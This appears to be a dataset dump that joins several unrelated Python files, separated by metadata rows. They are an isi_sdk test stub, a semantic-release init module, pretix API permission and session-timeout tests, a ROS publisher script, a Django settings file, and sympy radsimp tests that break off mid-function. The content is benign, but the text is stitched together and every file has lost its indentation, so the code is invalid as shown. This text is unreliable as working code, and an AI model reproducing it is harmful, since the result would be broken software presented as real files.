"""
from __future__ import absolute_import
import unittest
import isi_sdk_7_2
from isi_sdk_7_2.models.compatibilities_ssd_active_active_item import CompatibilitiesSsdActiveActiveItem # noqa: E501
from isi_sdk_7_2.rest import ApiException
class TestCompatibilitiesSsdActiveActiveItem(unittest.TestCase):
"""CompatibilitiesSsdActiveActiveItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCompatibilitiesSsdActiveActiveItem(self):
"""Test CompatibilitiesSsdActiveActiveItem"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_7_2.models.compatibilities_ssd_active_active_item.CompatibilitiesSsdActiveActiveItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 25.658537 | 126 | 0.747148 |
b55efd3bfb834dcd6b46876872e4070f520c902f | 450 | py | Python | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 445 | 2015-07-27T17:48:25.000Z | 2022-03-31T15:48:10.000Z | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 338 | 2015-07-27T18:44:52.000Z | 2022-03-31T11:38:53.000Z | semantic_release/__init__.py | MattPColeman/python-semantic-release | 09af5f11a6134c8711b59a5bcd57c917c0c91b5e | [
"MIT"
] | 168 | 2015-07-28T20:32:52.000Z | 2022-03-31T10:45:06.000Z | """Semantic Release
"""
__version__ = "7.23.0"
from .errors import UnknownCommitMessageStyleError # noqa; noqa
from .errors import ImproperConfigurationError, SemanticReleaseBaseError
def setup_hook(argv: list):
"""
A hook to be used in setup.py to enable `python setup.py publish`.
:param argv: sys.argv
"""
if len(argv) > 1 and argv[1] in ["version", "publish", "changelog"]:
from .cli import main
main()
| 22.5 | 72 | 0.668889 |
08f51885f1d5299ca8ae85d211fc75ae5fea7b5b | 19,354 | py | Python | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/api/test_permissions.py | gnomus/pretix | 9a9ae3e7807c5fce12adeabf5e2bb81e6b32fb38 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import time
import pytest
from django.test import override_settings
from django.utils.timezone import now
from pretix.base.models import Organizer
event_urls = [
(None, ''),
(None, 'categories/'),
('can_view_orders', 'invoices/'),
(None, 'items/'),
('can_view_orders', 'orders/'),
('can_view_orders', 'orderpositions/'),
(None, 'questions/'),
(None, 'quotas/'),
('can_view_vouchers', 'vouchers/'),
(None, 'subevents/'),
(None, 'taxrules/'),
('can_view_orders', 'waitinglistentries/'),
('can_view_orders', 'checkinlists/'),
]
event_permission_sub_urls = [
('get', 'can_view_orders', 'orders/', 200),
('get', 'can_view_orders', 'orderpositions/', 200),
('delete', 'can_change_orders', 'orderpositions/1/', 404),
('post', 'can_change_orders', 'orderpositions/1/price_calc/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_orders', 'invoices/', 200),
('get', 'can_view_orders', 'invoices/1/', 404),
('post', 'can_change_orders', 'invoices/1/regenerate/', 404),
('post', 'can_change_orders', 'invoices/1/reissue/', 404),
('get', 'can_view_orders', 'waitinglistentries/', 200),
('get', 'can_view_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/', 400),
('delete', 'can_change_orders', 'waitinglistentries/1/', 404),
('patch', 'can_change_orders', 'waitinglistentries/1/', 404),
('put', 'can_change_orders', 'waitinglistentries/1/', 404),
('post', 'can_change_orders', 'waitinglistentries/1/send_voucher/', 404),
('get', None, 'categories/', 200),
('get', None, 'items/', 200),
('get', None, 'questions/', 200),
('get', None, 'quotas/', 200),
('post', 'can_change_items', 'items/', 400),
('get', None, 'items/1/', 404),
('put', 'can_change_items', 'items/1/', 404),
('patch', 'can_change_items', 'items/1/', 404),
('delete', 'can_change_items', 'items/1/', 404),
('post', 'can_change_items', 'categories/', 400),
('get', None, 'categories/1/', 404),
('put', 'can_change_items', 'categories/1/', 404),
('patch', 'can_change_items', 'categories/1/', 404),
('delete', 'can_change_items', 'categories/1/', 404),
('post', 'can_change_items', 'items/1/variations/', 404),
('get', None, 'items/1/variations/', 404),
('get', None, 'items/1/variations/1/', 404),
('put', 'can_change_items', 'items/1/variations/1/', 404),
('patch', 'can_change_items', 'items/1/variations/1/', 404),
('delete', 'can_change_items', 'items/1/variations/1/', 404),
('get', None, 'items/1/addons/', 404),
('get', None, 'items/1/addons/1/', 404),
('post', 'can_change_items', 'items/1/addons/', 404),
('put', 'can_change_items', 'items/1/addons/1/', 404),
('patch', 'can_change_items', 'items/1/addons/1/', 404),
('delete', 'can_change_items', 'items/1/addons/1/', 404),
('get', None, 'subevents/', 200),
('get', None, 'subevents/1/', 404),
('get', None, 'taxrules/', 200),
('get', None, 'taxrules/1/', 404),
('post', 'can_change_event_settings', 'taxrules/', 400),
('put', 'can_change_event_settings', 'taxrules/1/', 404),
('patch', 'can_change_event_settings', 'taxrules/1/', 404),
('delete', 'can_change_event_settings', 'taxrules/1/', 404),
('get', 'can_view_vouchers', 'vouchers/', 200),
('get', 'can_view_vouchers', 'vouchers/1/', 404),
('post', 'can_change_vouchers', 'vouchers/', 201),
('put', 'can_change_vouchers', 'vouchers/1/', 404),
('patch', 'can_change_vouchers', 'vouchers/1/', 404),
('delete', 'can_change_vouchers', 'vouchers/1/', 404),
('get', None, 'quotas/', 200),
('get', None, 'quotas/1/', 404),
('post', 'can_change_items', 'quotas/', 400),
('put', 'can_change_items', 'quotas/1/', 404),
('patch', 'can_change_items', 'quotas/1/', 404),
('delete', 'can_change_items', 'quotas/1/', 404),
('get', None, 'questions/', 200),
('get', None, 'questions/1/', 404),
('post', 'can_change_items', 'questions/', 400),
('put', 'can_change_items', 'questions/1/', 404),
('patch', 'can_change_items', 'questions/1/', 404),
('delete', 'can_change_items', 'questions/1/', 404),
('get', None, 'questions/1/options/', 404),
('get', None, 'questions/1/options/1/', 404),
('put', 'can_change_items', 'questions/1/options/1/', 404),
('patch', 'can_change_items', 'questions/1/options/1/', 404),
('delete', 'can_change_items', 'questions/1/options/1/', 404),
('post', 'can_change_orders', 'orders/', 400),
('patch', 'can_change_orders', 'orders/ABC12/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_paid/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_pending/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_expired/', 404),
('post', 'can_change_orders', 'orders/ABC12/mark_canceled/', 404),
('post', 'can_change_orders', 'orders/ABC12/approve/', 404),
('post', 'can_change_orders', 'orders/ABC12/deny/', 404),
('post', 'can_change_orders', 'orders/ABC12/extend/', 400),
('post', 'can_change_orders', 'orders/ABC12/create_invoice/', 404),
('post', 'can_change_orders', 'orders/ABC12/resend_link/', 404),
('post', 'can_change_orders', 'orders/ABC12/regenerate_secrets/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/', 404),
('get', 'can_view_orders', 'orders/ABC12/payments/1/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/', 404),
('get', 'can_view_orders', 'orders/ABC12/refunds/1/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/confirm/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/refund/', 404),
('post', 'can_change_orders', 'orders/ABC12/payments/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/cancel/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/process/', 404),
('post', 'can_change_orders', 'orders/ABC12/refunds/1/done/', 404),
('get', 'can_view_orders', 'checkinlists/', 200),
('post', 'can_change_event_settings', 'checkinlists/', 400),
('put', 'can_change_event_settings', 'checkinlists/1/', 404),
('patch', 'can_change_event_settings', 'checkinlists/1/', 404),
('delete', 'can_change_event_settings', 'checkinlists/1/', 404),
('post', 'can_create_events', 'clone/', 400),
('get', 'can_view_orders', 'cartpositions/', 200),
('get', 'can_view_orders', 'cartpositions/1/', 404),
('post', 'can_change_orders', 'cartpositions/', 400),
('delete', 'can_change_orders', 'cartpositions/1/', 404),
]
org_permission_sub_urls = [
('get', 'can_change_organizer_settings', 'webhooks/', 200),
('post', 'can_change_organizer_settings', 'webhooks/', 400),
('get', 'can_change_organizer_settings', 'webhooks/1/', 404),
('put', 'can_change_organizer_settings', 'webhooks/1/', 404),
('patch', 'can_change_organizer_settings', 'webhooks/1/', 404),
('delete', 'can_change_organizer_settings', 'webhooks/1/', 404),
('get', 'can_manage_gift_cards', 'giftcards/', 200),
('post', 'can_manage_gift_cards', 'giftcards/', 400),
('get', 'can_manage_gift_cards', 'giftcards/1/', 404),
('put', 'can_manage_gift_cards', 'giftcards/1/', 404),
('patch', 'can_manage_gift_cards', 'giftcards/1/', 404),
]
event_permission_root_urls = [
('post', 'can_create_events', 400),
('put', 'can_change_event_settings', 400),
('patch', 'can_change_event_settings', 200),
('delete', 'can_change_event_settings', 204),
]
@pytest.fixture
def token_client(client, team):
team.can_view_orders = True
team.can_view_vouchers = True
team.can_change_items = True
team.save()
t = team.tokens.create(name='Foo')
client.credentials(HTTP_AUTHORIZATION='Token ' + t.token)
return client
@pytest.mark.django_db
def test_organizer_allowed(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert resp.status_code == 200
@pytest.mark.django_db
def test_organizer_not_allowed(token_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = token_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_allowed_device(device_client, organizer):
o2 = Organizer.objects.create(slug='o2', name='Organizer 2')
resp = device_client.get('/api/v1/organizers/{}/events/'.format(o2.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_organizer_not_existing(token_client, organizer):
resp = token_client.get('/api/v1/organizers/{}/events/'.format('o2'))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events(token_client, team, organizer, event, url):
team.all_events = True
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_all_events_device(device_client, device, organizer, event, url):
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events(token_client, organizer, team, event, url):
team.all_events = False
team.save()
team.limit_events.add(event)
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_allowed_limit_events_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
device.limit_events.add(event)
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
if url[0] is None or url[0] in device.permission_set():
assert resp.status_code == 200
else:
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed(token_client, organizer, team, event, url):
team.all_events = False
team.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_allowed_device(device_client, organizer, device, event, url):
device.all_events = False
device.save()
resp = device_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_not_existing(token_client, organizer, url, event):
resp = token_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_token_event_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], True)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == urlset[2]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_root_urls)
def test_token_event_permission_not_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
setattr(team, urlset[1], False)
team.save()
if urlset[0] == 'post':
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/'.format(organizer.slug))
else:
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/events/{}/'.format(organizer.slug, event.slug))
assert resp.status_code == 403
@pytest.mark.django_db
def test_log_out_after_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_absolute_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
@override_settings(PRETIX_LONG_SESSIONS=False)
def test_ignore_long_session_if_disabled_in_config(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 12 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_log_out_after_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 403
@pytest.mark.django_db
def test_dont_logout_before_relative_timeout(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 6
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 + 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_dont_logout_by_relative_in_long_session(user_client, team, organizer, event):
session = user_client.session
session['pretix_auth_long_session'] = True
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = int(time.time()) - 3600 * 3 - 60
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
@pytest.mark.django_db
def test_update_session_activity(user_client, team, organizer, event):
t1 = int(time.time()) - 5
session = user_client.session
session['pretix_auth_long_session'] = False
session['pretix_auth_login_time'] = int(time.time()) - 3600 * 5
session['pretix_auth_last_used'] = t1
session.save()
response = user_client.get('/api/v1/organizers/{}/events/'.format(organizer.slug))
assert response.status_code == 200
assert user_client.session['pretix_auth_last_used'] > t1
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", event_permission_sub_urls)
def test_device_subresource_permission_check(device_client, device, organizer, event, urlset):
resp = getattr(device_client, urlset[0])('/api/v1/organizers/{}/events/{}/{}'.format(
organizer.slug, event.slug, urlset[2]))
if urlset[1] is None or urlset[1] in device.permission_set():
assert resp.status_code == urlset[3]
else:
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_allowed(token_client, team, organizer, event, urlset):
team.all_events = True
if urlset[1]:
setattr(team, urlset[1], True)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2]))
assert resp.status_code == urlset[3]
@pytest.mark.django_db
@pytest.mark.parametrize("urlset", org_permission_sub_urls)
def test_token_org_subresources_permission_not_allowed(token_client, team, organizer, event, urlset):
if urlset[1] is None:
team.all_events = False
else:
team.all_events = True
setattr(team, urlset[1], False)
team.save()
resp = getattr(token_client, urlset[0])('/api/v1/organizers/{}/{}'.format(
organizer.slug, urlset[2]))
if urlset[3] == 404:
assert resp.status_code == 403
else:
assert resp.status_code in (404, 403)
@pytest.mark.django_db
@pytest.mark.parametrize("url", event_urls)
def test_event_staff_requires_staff_session(user_client, organizer, team, event, url, user):
team.delete()
user.is_staff = True
user.save()
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 403
user.staffsession_set.create(date_start=now(), session_key=user_client.session.session_key)
resp = user_client.get('/api/v1/organizers/{}/events/{}/{}'.format(organizer.slug, event.slug, url[1]))
assert resp.status_code == 200
| 41.532189 | 118 | 0.677844 |
8a07036df3dec476a30b3c2242d77bf2005b0dfc | 451 | py | Python | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null | pr2_robot/scripts/mover.py | kitu2007/RoboND-Perception-Project | e12fcf5afb7a4ef0b7c4d09d1841d04557f59edc | [
"MIT"
] | null | null | null |
import math
import rospy
from std_msgs.msg import Float64
def mover(topic, msg_type, value_fn):
pub_j1 = rospy.Publisher(topic, msg_type, queue_size=10)
rospy.init_node('robot_mover')
rate = rospy.Rate(10)
start_time = 0
while not start_time:
start_time = rospy.Time.now().to_sec()
while not rospy.is_shutdown():
t = rospy.Time.now()-start_time
pub_j1.publish(value_fn(t))
rate.sleep()
| 19.608696 | 60 | 0.660754 |
c1c21036eeb45850a0bdd7a8c79231c6d41477f9 | 4,452 | py | Python | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | config/settings/base.py | devspoon/devspoon-django-default-structure | dd48fc0476dee2c89c68d29fca7d6084380de1c7 | [
"MIT"
] | null | null | null | """
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
from decouple import config
from os.path import join
from django.contrib import messages
#from .sub_settings.email.gmail import *
from .sub_settings.email.sendinblue import *
#from .sub_settings.email.mailgun import *
# from .sub_settings.email.sendgrid import *
#from .sub_settings.email.aws_ses import *
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
ROOT_DIR = os.path.dirname(BASE_DIR)
TEMPLATE_DIR = os.path.join(ROOT_DIR, "templates")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
"anymail",
'imagekit',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend' # 기본 인증 백엔드
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
"DIRS": [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
#LANGUAGE_CODE = "ko-kr"
LANGUAGE_CODE = 'en-us'
#TIME_ZONE = "Asia/Seoul"
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True #true로 선택하면 UTC 기준으로 시간이 저장됨
# ref : https://it-eldorado.tistory.com/13
# 자동으로 모델의 id 혹은 pk를 설정해줌
# ref :
# 1. https://dev.to/weplayinternet/upgrading-to-django-3-2-and-fixing-defaultautofield-warnings-518n
# 2. https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# 기본 로그인 페이지 URL 지정
# login_required 장식자 등에 의해서 사용
LOGIN_URL = "/users/login/"
# 로그인 완료 후 next 인자가 지정되면 해당 URL 페이지로 이동
# next 인자가 없으면 아래 URL로 이동
LOGIN_REDIRECT_URL = ""
# 로그아웃 후에 next 인자기 지정되면 해당 URL 페이지로 이동
# next 인자가 없으면 LOGOUT_REDIRECT_URL로 이동
# LOGOUT_REDIRECT_URL이 None(디폴트)이면, 'registration/logged_out.html' 템플릿 렌더링
LOGOUT_REDIRECT_URL = LOGIN_REDIRECT_URL
# 인증에 사용할 커스텀 User 모델 지정 : '앱이름.모델명'
# AUTH_USER_MODEL = 'user.Usert'
SITE_ID = 1
# messages setting
MESSAGE_TAGS = {
messages.DEBUG: 'alert-info',
messages.INFO: 'alert-info',
messages.SUCCESS: 'alert-success',
messages.WARNING: 'alert-warning',
messages.ERROR: 'alert-danger',
}
# Django Session Timeout Code
SESSION_COOKIE_AGE = 1200 # second
SESSION_SAVE_EVERY_REQUEST = True
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# SESSION_COOKIE_SECURE = True # https
| 26.981818 | 100 | 0.721698 |
769ddcfaffaf2ea53de4ae6c673514c1939c837a | 17,178 | py | Python | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | 2 | 2019-05-18T22:36:49.000Z | 2019-05-24T05:56:16.000Z | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | null | null | null | env/lib/python3.8/site-packages/sympy/simplify/tests/test_radsimp.py | crimergio/linux_test | 5e688a06884ab10b4eaaad10a5d0df417a1c9b31 | [
"CC-BY-4.0"
] | 3 | 2019-05-18T21:32:31.000Z | 2019-07-26T11:05:46.000Z | from sympy import (
sqrt, Derivative, symbols, collect, Function, factor, Wild, S,
collect_const, log, fraction, I, cos, Add, O,sin, rcollect,
Mul, radsimp, diff, root, Symbol, Rational, exp, Abs)
from sympy.core.expr import unchanged
from sympy.core.mul import _unevaluated_Mul as umul
from sympy.simplify.radsimp import (_unevaluated_Add,
collect_sqrt, fraction_expand, collect_abs)
from sympy.testing.pytest import raises
from sympy.abc import x, y, z, a, b, c, d
def test_radsimp():
r2 = sqrt(2)
r3 = sqrt(3)
r5 = sqrt(5)
r7 = sqrt(7)
assert fraction(radsimp(1/r2)) == (sqrt(2), 2)
assert radsimp(1/(1 + r2)) == \
-1 + sqrt(2)
assert radsimp(1/(r2 + r3)) == \
-sqrt(2) + sqrt(3)
assert fraction(radsimp(1/(1 + r2 + r3))) == \
(-sqrt(6) + sqrt(2) + 2, 4)
assert fraction(radsimp(1/(r2 + r3 + r5))) == \
(-sqrt(30) + 2*sqrt(3) + 3*sqrt(2), 12)
assert fraction(radsimp(1/(1 + r2 + r3 + r5))) == (
(-34*sqrt(10) - 26*sqrt(15) - 55*sqrt(3) - 61*sqrt(2) + 14*sqrt(30) +
93 + 46*sqrt(6) + 53*sqrt(5), 71))
assert fraction(radsimp(1/(r2 + r3 + r5 + r7))) == (
(-50*sqrt(42) - 133*sqrt(5) - 34*sqrt(70) - 145*sqrt(3) + 22*sqrt(105)
+ 185*sqrt(2) + 62*sqrt(30) + 135*sqrt(7), 215))
z = radsimp(1/(1 + r2/3 + r3/5 + r5 + r7))
assert len((3616791619821680643598*z).args) == 16
assert radsimp(1/z) == 1/z
assert radsimp(1/z, max_terms=20).expand() == 1 + r2/3 + r3/5 + r5 + r7
assert radsimp(1/(r2*3)) == \
sqrt(2)/6
assert radsimp(1/(r2*a + r3 + r5 + r7)) == (
(8*sqrt(2)*a**7 - 8*sqrt(7)*a**6 - 8*sqrt(5)*a**6 - 8*sqrt(3)*a**6 -
180*sqrt(2)*a**5 + 8*sqrt(30)*a**5 + 8*sqrt(42)*a**5 + 8*sqrt(70)*a**5
- 24*sqrt(105)*a**4 + 84*sqrt(3)*a**4 + 100*sqrt(5)*a**4 +
116*sqrt(7)*a**4 - 72*sqrt(70)*a**3 - 40*sqrt(42)*a**3 -
8*sqrt(30)*a**3 + 782*sqrt(2)*a**3 - 462*sqrt(3)*a**2 -
302*sqrt(7)*a**2 - 254*sqrt(5)*a**2 + 120*sqrt(105)*a**2 -
795*sqrt(2)*a - 62*sqrt(30)*a + 82*sqrt(42)*a + 98*sqrt(70)*a -
118*sqrt(105) + 59*sqrt(7) + 295*sqrt(5) + 531*sqrt(3))/(16*a**8 -
480*a**6 + 3128*a**4 - 6360*a**2 + 3481))
assert radsimp(1/(r2*a + r2*b + r3 + r7)) == (
(sqrt(2)*a*(a + b)**2 - 5*sqrt(2)*a + sqrt(42)*a + sqrt(2)*b*(a +
b)**2 - 5*sqrt(2)*b + sqrt(42)*b - sqrt(7)*(a + b)**2 - sqrt(3)*(a +
b)**2 - 2*sqrt(3) + 2*sqrt(7))/(2*a**4 + 8*a**3*b + 12*a**2*b**2 -
20*a**2 + 8*a*b**3 - 40*a*b + 2*b**4 - 20*b**2 + 8))
assert radsimp(1/(r2*a + r2*b + r2*c + r2*d)) == \
sqrt(2)/(2*a + 2*b + 2*c + 2*d)
assert radsimp(1/(1 + r2*a + r2*b + r2*c + r2*d)) == (
(sqrt(2)*a + sqrt(2)*b + sqrt(2)*c + sqrt(2)*d - 1)/(2*a**2 + 4*a*b +
4*a*c + 4*a*d + 2*b**2 + 4*b*c + 4*b*d + 2*c**2 + 4*c*d + 2*d**2 - 1))
assert radsimp((y**2 - x)/(y - sqrt(x))) == \
sqrt(x) + y
assert radsimp(-(y**2 - x)/(y - sqrt(x))) == \
-(sqrt(x) + y)
assert radsimp(1/(1 - I + a*I)) == \
(-I*a + 1 + I)/(a**2 - 2*a + 2)
assert radsimp(1/((-x + y)*(x - sqrt(y)))) == \
(-x - sqrt(y))/((x - y)*(x**2 - y))
e = (3 + 3*sqrt(2))*x*(3*x - 3*sqrt(y))
assert radsimp(e) == x*(3 + 3*sqrt(2))*(3*x - 3*sqrt(y))
assert radsimp(1/e) == (
(-9*x + 9*sqrt(2)*x - 9*sqrt(y) + 9*sqrt(2)*sqrt(y))/(9*x*(9*x**2 -
9*y)))
assert radsimp(1 + 1/(1 + sqrt(3))) == \
Mul(S.Half, -1 + sqrt(3), evaluate=False) + 1
A = symbols("A", commutative=False)
assert radsimp(x**2 + sqrt(2)*x**2 - sqrt(2)*x*A) == \
x**2 + sqrt(2)*x**2 - sqrt(2)*x*A
